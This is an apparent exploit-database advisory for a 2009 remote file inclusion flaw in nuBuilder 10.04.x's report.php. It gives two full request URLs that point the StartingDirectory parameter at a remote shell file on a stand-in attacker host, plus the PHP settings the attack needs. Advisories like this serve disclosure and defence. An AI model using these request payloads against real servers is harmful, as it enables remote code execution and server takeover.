vendor:
nuBuilder
by:
Ahlspiess
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: nuBuilder
Affected Version From: 10.04.x
Affected Version To: 10.04.x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009
nuBuilder 10.04.x and lower Remote File Inclusion
nuBuilder 10.04.x and lower is vulnerable to Remote File Inclusion. The vulnerable file is report.php which includes the $GLOBALS['StartingDirectory'] variable without any sanitization. This allows an attacker to inject malicious code into the application. The exploit can be tested against php config register_global = On and Off, allow_url_include = On. When register_global = Off, the exploit can be triggered by sending a request to http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?. When register_global = On, the exploit can be triggered by sending a request to http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?.
Mitigation:
Input validation should be used to prevent Remote File Inclusion attacks. The application should validate all user input and reject any input that contains malicious code.
